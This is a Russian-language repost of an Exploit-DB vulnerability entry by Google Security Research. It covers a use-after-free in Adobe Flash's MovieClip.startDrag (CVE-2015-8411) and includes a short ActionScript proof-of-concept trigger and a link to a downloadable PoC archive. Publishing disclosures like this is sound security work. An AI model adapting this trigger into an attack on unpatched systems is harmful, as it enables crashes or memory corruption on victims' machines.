- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39041
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2015-8411
- Дата публикации
- 2015-12-18
Adobe Flash MovieClip.startDrag - Use-After-Free
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=592
There is a use-after-free in MovieClip.startDrag. If a parameter an object with valueOf defined, this method can free the MovieClip, which is then used.
A minimal POC follows:
this.createEmptyMovieClip("mc", 1);
mc.startDrag( true, {valueOf : func}, 1, 2, 3, 4);
function func(){
mc.removeMovieClip();
// Fix heap here
return 1;
}
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39041.zip
- Источник
- www.exploit-db.com